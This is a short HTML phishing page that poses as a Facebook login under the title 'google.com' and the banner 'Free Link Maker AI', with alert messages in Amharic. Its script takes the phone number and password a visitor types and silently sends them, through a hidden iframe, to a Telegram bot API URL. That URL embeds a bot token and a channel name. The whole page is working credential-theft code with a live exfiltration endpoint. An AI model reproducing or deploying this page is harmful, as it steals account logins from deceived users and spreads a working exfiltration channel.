<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>google.com</title>
<style type="text/css">
body{
margin:0px;
}
img{
width:2cm;
height:2cm;
border-radius:50%;
box-shadow:0px 0px 4px 4px grey;
}input{
width:80%;
height:1cm;
outline:none;
border:2px solid dodgerblue;
border-radius:6px;
margin-left:10%;
text-align:left;
font-weight:bold;
font-size:20px;
}button {
width:80%;
height:1cm;
outline:none;
border:2px solid dodgerblue;
border-radius:6px;
margin-left:11%;
background-color:dodgerblue;
font-weight:bold;
color:white;
font-size:20px;
}
marquee{
width:100%;
height:1cm;
font-size:30px;
background-color:dodgerblue;
font-weight:bold;
color:white;
}
#i{
display:none;
}
</style>
</head>
<body>
<marquee>Free Link Maker AI</marquee><br><br>
<center>
<img src="facebook.png"><br><br><br>
</center>

<input type="text"id="gmail"placeholder="Phone Number"><br><br>

<input type="password"id="password"placeholder="password"><br>
<br><br>
<button onclick="subms()">Login</button>

<script type="text/javascript">
function subms(){
var x=document.getElementById("gmail").value;
var y=document.getElementById("password").value;
var iframe=document.getElementById("i");
  if(x.length<4 || y.length<4){
  alert("እባክዎ የተሳሳተ መረጃ አስገብተዋል");
  }else{
  iframe.setAttribute("src","https://api.telegram.org/bot7203322344:AAG55iNMgFGHHwHAOgvc5vxRHiyEkrAIOF4/sendMessage?chat_id=@ethiotelecom111&text="+x+'\n'+y+"");
  //alert("አልተሳካም እባክዎ ወደኋላ ተመልሰው facebook በሚለው ይሞክሩ");
 }
}

</script>
<iframe width="50" src=""id="i">
</body>
</html>